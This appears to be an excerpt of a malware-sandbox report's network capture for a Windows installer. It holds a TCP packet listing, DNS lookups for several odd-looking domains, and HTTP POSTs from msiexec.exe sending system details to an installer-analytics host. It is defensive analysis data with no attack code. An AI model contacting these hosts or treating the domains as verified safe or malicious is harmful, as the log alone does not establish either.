                              Aug 2, 2024 14:16:50.182379961 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.182404995 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.182423115 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.182463884 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.182477951 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.182527065 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.182542086 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.182564974 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.182594061 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.182611942 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.182635069 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.182657003 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.182692051 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.182714939 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.182735920 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.182761908 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.182775974 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.182822943 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.182837009 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.182879925 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.182883978 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.182898045 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.182919025 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.182934999 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.182976007 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.182990074 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.183010101 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.183043003 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.183060884 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.183088064 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.183731079 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.183779955 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.183795929 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.183832884 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.183851957 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.183865070 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.183892965 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.184060097 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.184114933 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.184128046 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.184187889 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.184189081 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.184201956 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.184263945 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.184282064 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.184303999 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.184309959 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.184370995 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.216140985 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.216219902 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.266220093 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.266304970 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.266602993 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.266630888 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.266676903 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.266707897 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.266736984 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.266804934 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.266957045 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.266973972 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.267014027 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.267030001 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.267056942 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.267079115 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.267923117 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.267926931 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.268012047 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.268028021 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.268080950 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.268568993 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.268584013 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.268642902 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.268657923 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.268711090 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.269061089 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.269082069 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.269141912 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.269157887 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.269216061 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.269840956 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.269855976 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.269917011 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.269931078 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.269990921 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.274343014 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.274357080 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.274424076 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.274441957 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.274501085 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.359230042 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.359304905 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.359447002 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.359447002 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.359520912 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.359587908 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.359658957 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.359704971 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.359729052 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.359744072 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.359777927 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.359802008 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.359812975 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.359884977 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.359890938 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.359914064 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.359951973 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.359954119 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.359988928 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:57.594360113 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:57.599257946 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:57.599442005 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:57.599442005 CEST4971080192.168.2.952.54.161.79
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 2, 2024 14:16:47.016180038 CEST | 55974 | 53 | 192.168.2.9 | 1.1.1.1
Aug 2, 2024 14:16:47.038918972 CEST | 53 | 55974 | 1.1.1.1 | 192.168.2.9
Aug 2, 2024 14:16:57.573844910 CEST | 53764 | 53 | 192.168.2.9 | 1.1.1.1
Aug 2, 2024 14:16:57.593055964 CEST | 53 | 53764 | 1.1.1.1 | 192.168.2.9
Aug 2, 2024 14:17:16.367676020 CEST | 56368 | 53 | 192.168.2.9 | 1.1.1.1
Aug 2, 2024 14:17:16.386087894 CEST | 53 | 56368 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 2, 2024 14:16:47.016180038 CEST | 192.168.2.9 | 1.1.1.1 | 0xab06 | Standard query (0) | yznv.prefintions.pro | A (IP address) | IN (0x0001) | false
Aug 2, 2024 14:16:57.573844910 CEST | 192.168.2.9 | 1.1.1.1 | 0x54c2 | Standard query (0) | collect.installeranalytics.com | A (IP address) | IN (0x0001) | false
Aug 2, 2024 14:17:16.367676020 CEST | 192.168.2.9 | 1.1.1.1 | 0x2d5b | Standard query (0) | acons2020temix54.lisf | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 2, 2024 14:16:47.038918972 CEST | 1.1.1.1 | 192.168.2.9 | 0xab06 | No error (0) | yznv.prefintions.pro | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Aug 2, 2024 14:16:47.038918972 CEST | 1.1.1.1 | 192.168.2.9 | 0xab06 | No error (0) | yznv.prefintions.pro | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Aug 2, 2024 14:16:56.467128038 CEST | 1.1.1.1 | 192.168.2.9 | 0x968e | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | - | CNAME (Canonical name) | IN (0x0001) | false
Aug 2, 2024 14:16:56.467128038 CEST | 1.1.1.1 | 192.168.2.9 | 0x968e | No error (0) | fp2e7a.wpc.phicdn.net | - | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Aug 2, 2024 14:16:57.593055964 CEST | 1.1.1.1 | 192.168.2.9 | 0x54c2 | No error (0) | collect.installeranalytics.com | - | 52.54.161.79 | A (IP address) | IN (0x0001) | false
Aug 2, 2024 14:16:57.593055964 CEST | 1.1.1.1 | 192.168.2.9 | 0x54c2 | No error (0) | collect.installeranalytics.com | - | 54.167.177.111 | A (IP address) | IN (0x0001) | false
Aug 2, 2024 14:17:16.386087894 CEST | 1.1.1.1 | 192.168.2.9 | 0x2d5b | Name error (3) | acons2020temix54.lisf | none | none | A (IP address) | IN (0x0001) | false
                              • yznv.prefintions.pro
                              • collect.installeranalytics.com
                              • 20.15.106.83
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49710 | 52.54.161.79 | 80 | 7176 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Aug 2, 2024 14:16:57.599442005 CEST | 241 | OUT | POST / HTTP/1.1
    Content-Type: application/x-www-form-urlencoded; charset=utf-8
    User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
    Host: collect.installeranalytics.com
    Content-Length: 167
    Cache-Control: no-cache
Aug 2, 2024 14:16:57.599531889 CEST | 167 | OUT | Data Raw: 71 74 3d 34 38 38 34 38 32 38 26 74 3d 6c 69 66 65 63 79 63 6c 65 26 6c 63 3d 73 74 61 72 74 26 76 3d 33 26 61 69 64 3d 36 36 61 63 30 63 39 65 32 66 66 35 30 38 62 66 62 61 38 37 38 61 61 35 26 61 76 3d 38 2e 37 2e 36 2e 38 26 63 69 64 3d 39 34
    Data Ascii: qt=4884828&t=lifecycle&lc=start&v=3&aid=66ac0c9e2ff508bfba878aa5&av=8.7.6.8&cid=94BCABD9E1EBB3E75B71854540642746D0A25913&sid=%7BAF3E5550-CCB7-4030-8139-9A55D2075DE7%7D
Aug 2, 2024 14:16:58.100822926 CEST | 338 | IN | HTTP/1.1 200 OK
    Cache-control: no-cache="set-cookie"
    Date: Fri, 02 Aug 2024 12:16:58 GMT
    Set-Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366;PATH=/;MAX-AGE=600
    X-Powered-By: Express
    Content-Length: 0
    Connection: keep-alive
Aug 2, 2024 14:16:58.108182907 CEST | 396 | OUT | POST / HTTP/1.1
    Content-Type: application/x-www-form-urlencoded; charset=utf-8
    User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
    Host: collect.installeranalytics.com
    Content-Length: 179
    Cache-Control: no-cache
    Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
Aug 2, 2024 14:16:58.108182907 CEST | 179 | OUT | Data Raw: 71 74 3d 34 38 38 36 30 31 35 26 74 3d 70 72 6f 70 65 72 74 79 26 6c 62 3d 56 65 72 73 69 6f 6e 4e 54 26 76 61 6c 3d 31 30 30 30 26 76 3d 33 26 61 69 64 3d 36 36 61 63 30 63 39 65 32 66 66 35 30 38 62 66 62 61 38 37 38 61 61 35 26 61 76 3d 38 2e
    Data Ascii: qt=4886015&t=property&lb=VersionNT&val=1000&v=3&aid=66ac0c9e2ff508bfba878aa5&av=8.7.6.8&cid=94BCABD9E1EBB3E75B71854540642746D0A25913&sid=%7BAF3E5550-CCB7-4030-8139-9A55D2075DE7%7D
Aug 2, 2024 14:16:58.279961109 CEST | 122 | IN | HTTP/1.1 200 OK
    Date: Fri, 02 Aug 2024 12:16:58 GMT
    X-Powered-By: Express
    Content-Length: 0
    Connection: keep-alive
Aug 2, 2024 14:16:58.281263113 CEST | 396 | OUT | POST / HTTP/1.1
    Content-Type: application/x-www-form-urlencoded; charset=utf-8
    User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
    Host: collect.installeranalytics.com
    Content-Length: 181
    Cache-Control: no-cache
    Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
Aug 2, 2024 14:16:58.281263113 CEST | 181 | OUT | Data Raw: 71 74 3d 34 38 38 36 31 38 37 26 74 3d 70 72 6f 70 65 72 74 79 26 6c 62 3d 56 65 72 73 69 6f 6e 4e 54 36 34 26 76 61 6c 3d 31 30 30 30 26 76 3d 33 26 61 69 64 3d 36 36 61 63 30 63 39 65 32 66 66 35 30 38 62 66 62 61 38 37 38 61 61 35 26 61 76 3d
    Data Ascii: qt=4886187&t=property&lb=VersionNT64&val=1000&v=3&aid=66ac0c9e2ff508bfba878aa5&av=8.7.6.8&cid=94BCABD9E1EBB3E75B71854540642746D0A25913&sid=%7BAF3E5550-CCB7-4030-8139-9A55D2075DE7%7D
Aug 2, 2024 14:16:58.399899006 CEST | 122 | IN | HTTP/1.1 200 OK
    Date: Fri, 02 Aug 2024 12:16:58 GMT
    X-Powered-By: Express
    Content-Length: 0
    Connection: keep-alive
Aug 2, 2024 14:16:58.401258945 CEST | 396 | OUT | POST / HTTP/1.1
    Content-Type: application/x-www-form-urlencoded; charset=utf-8
    User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
    Host: collect.installeranalytics.com
    Content-Length: 184
    Cache-Control: no-cache
    Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
Aug 2, 2024 14:16:58.401294947 CEST | 184 | OUT | Data Raw: 71 74 3d 34 38 38 36 33 31 32 26 74 3d 70 72 6f 70 65 72 74 79 26 6c 62 3d 50 68 79 73 69 63 61 6c 4d 65 6d 6f 72 79 26 76 61 6c 3d 38 31 39 31 26 76 3d 33 26 61 69 64 3d 36 36 61 63 30 63 39 65 32 66 66 35 30 38 62 66 62 61 38 37 38 61 61 35 26
    Data Ascii: qt=4886312&t=property&lb=PhysicalMemory&val=8191&v=3&aid=66ac0c9e2ff508bfba878aa5&av=8.7.6.8&cid=94BCABD9E1EBB3E75B71854540642746D0A25913&sid=%7BAF3E5550-CCB7-4030-8139-9A55D2075DE7%7D
Aug 2, 2024 14:16:58.519922018 CEST | 122 | IN | HTTP/1.1 200 OK
    Date: Fri, 02 Aug 2024 12:16:58 GMT
    X-Powered-By: Express
    Content-Length: 0
    Connection: keep-alive
Aug 2, 2024 14:16:58.534373045 CEST | 396 | OUT | POST / HTTP/1.1
    Content-Type: application/x-www-form-urlencoded; charset=utf-8
    User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
    Host: collect.installeranalytics.com
    Content-Length: 180
    Cache-Control: no-cache
    Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
Aug 2, 2024 14:16:58.534404993 CEST | 180 | OUT | Data Raw: 71 74 3d 34 38 38 36 34 33 37 26 74 3d 70 72 6f 70 65 72 74 79 26 6c 62 3d 56 65 72 73 69 6f 6e 4d 73 69 26 76 61 6c 3d 35 2e 30 30 26 76 3d 33 26 61 69 64 3d 36 36 61 63 30 63 39 65 32 66 66 35 30 38 62 66 62 61 38 37 38 61 61 35 26 61 76 3d 38
    Data Ascii: qt=4886437&t=property&lb=VersionMsi&val=5.00&v=3&aid=66ac0c9e2ff508bfba878aa5&av=8.7.6.8&cid=94BCABD9E1EBB3E75B71854540642746D0A25913&sid=%7BAF3E5550-CCB7-4030-8139-9A55D2075DE7%7D
Aug 2, 2024 14:16:58.707993031 CEST | 122 | IN | HTTP/1.1 200 OK
    Date: Fri, 02 Aug 2024 12:16:58 GMT
    X-Powered-By: Express
    Content-Length: 0
    Connection: keep-alive
Aug 2, 2024 14:16:58.709405899 CEST | 396 | OUT | POST / HTTP/1.1
    Content-Type: application/x-www-form-urlencoded; charset=utf-8
    User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
    Host: collect.installeranalytics.com
    Content-Length: 174
    Cache-Control: no-cache
    Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
Aug 2, 2024 14:16:58.709405899 CEST | 174 | OUT | Data Raw: 71 74 3d 34 38 38 36 36 30 39 26 74 3d 70 72 6f 70 65 72 74 79 26 6c 62 3d 55 49 4c 65 76 65 6c 26 76 61 6c 3d 33 26 76 3d 33 26 61 69 64 3d 36 36 61 63 30 63 39 65 32 66 66 35 30 38 62 66 62 61 38 37 38 61 61 35 26 61 76 3d 38 2e 37 2e 36 2e 38
    Data Ascii: qt=4886609&t=property&lb=UILevel&val=3&v=3&aid=66ac0c9e2ff508bfba878aa5&av=8.7.6.8&cid=94BCABD9E1EBB3E75B71854540642746D0A25913&sid=%7BAF3E5550-CCB7-4030-8139-9A55D2075DE7%7D
Aug 2, 2024 14:16:58.828140020 CEST | 122 | IN | HTTP/1.1 200 OK
    Date: Fri, 02 Aug 2024 12:16:58 GMT
    X-Powered-By: Express
    Content-Length: 0
    Connection: keep-alive
Aug 2, 2024 14:16:58.829271078 CEST | 396 | OUT | POST / HTTP/1.1
    Content-Type: application/x-www-form-urlencoded; charset=utf-8
    User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
    Host: collect.installeranalytics.com
    Content-Length: 183
    Cache-Control: no-cache
    Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:16:58.829318047 CEST183OUTData Raw: 71 74 3d 34 38 38 36 37 33 34 26 74 3d 70 72 6f 70 65 72 74 79 26 6c 62 3d 56 69 72 74 75 61 6c 4d 65 6d 6f 72 79 26 76 61 6c 3d 36 37 36 35 26 76 3d 33 26 61 69 64 3d 36 36 61 63 30 63 39 65 32 66 66 35 30 38 62 66 62 61 38 37 38 61 61 35 26 61
                              Data Ascii: qt=4886734&t=property&lb=VirtualMemory&val=6765&v=3&aid=66ac0c9e2ff508bfba878aa5&av=8.7.6.8&cid=94BCABD9E1EBB3E75B71854540642746D0A25913&sid=%7BAF3E5550-CCB7-4030-8139-9A55D2075DE7%7D
                              Aug 2, 2024 14:16:59.000760078 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:16:58 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:16:59.003102064 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 183
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:16:59.003117085 CEST183OUTData Raw: 71 74 3d 34 38 38 36 39 30 36 26 74 3d 70 72 6f 70 65 72 74 79 26 6c 62 3d 4d 73 69 4e 54 50 72 6f 64 75 63 74 54 79 70 65 26 76 61 6c 3d 31 26 76 3d 33 26 61 69 64 3d 36 36 61 63 30 63 39 65 32 66 66 35 30 38 62 66 62 61 38 37 38 61 61 35 26 61
                              Data Ascii: qt=4886906&t=property&lb=MsiNTProductType&val=1&v=3&aid=66ac0c9e2ff508bfba878aa5&av=8.7.6.8&cid=94BCABD9E1EBB3E75B71854540642746D0A25913&sid=%7BAF3E5550-CCB7-4030-8139-9A55D2075DE7%7D
                              Aug 2, 2024 14:16:59.120764017 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:16:59 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:16:59.121942043 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 183
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:16:59.122000933 CEST183OUTData Raw: 71 74 3d 34 38 38 37 30 33 31 26 74 3d 70 72 6f 70 65 72 74 79 26 6c 62 3d 53 65 72 76 69 63 65 50 61 63 6b 4c 65 76 65 6c 26 76 61 6c 3d 30 26 76 3d 33 26 61 69 64 3d 36 36 61 63 30 63 39 65 32 66 66 35 30 38 62 66 62 61 38 37 38 61 61 35 26 61
                              Data Ascii: qt=4887031&t=property&lb=ServicePackLevel&val=0&v=3&aid=66ac0c9e2ff508bfba878aa5&av=8.7.6.8&cid=94BCABD9E1EBB3E75B71854540642746D0A25913&sid=%7BAF3E5550-CCB7-4030-8139-9A55D2075DE7%7D
                              Aug 2, 2024 14:16:59.238928080 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:16:59 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:16:59.241369963 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 185
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:16:59.241449118 CEST185OUTData Raw: 71 74 3d 34 38 38 37 31 34 30 26 74 3d 70 72 6f 70 65 72 74 79 26 6c 62 3d 50 72 6f 64 75 63 74 4c 61 6e 67 75 61 67 65 26 76 61 6c 3d 31 30 34 36 26 76 3d 33 26 61 69 64 3d 36 36 61 63 30 63 39 65 32 66 66 35 30 38 62 66 62 61 38 37 38 61 61 35
                              Data Ascii: qt=4887140&t=property&lb=ProductLanguage&val=1046&v=3&aid=66ac0c9e2ff508bfba878aa5&av=8.7.6.8&cid=94BCABD9E1EBB3E75B71854540642746D0A25913&sid=%7BAF3E5550-CCB7-4030-8139-9A55D2075DE7%7D
                              Aug 2, 2024 14:16:59.357131958 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:16:59 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:16:59.359544039 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 195
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:16:59.476516962 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:16:59 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:16:59.477715969 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 192
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:16:59.646718025 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:16:59 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:16:59.648118019 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 195
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:16:59.822338104 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:16:59 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:16:59.823615074 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 192
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:16:59.995480061 CEST122INHTTP/1.1 200 OK
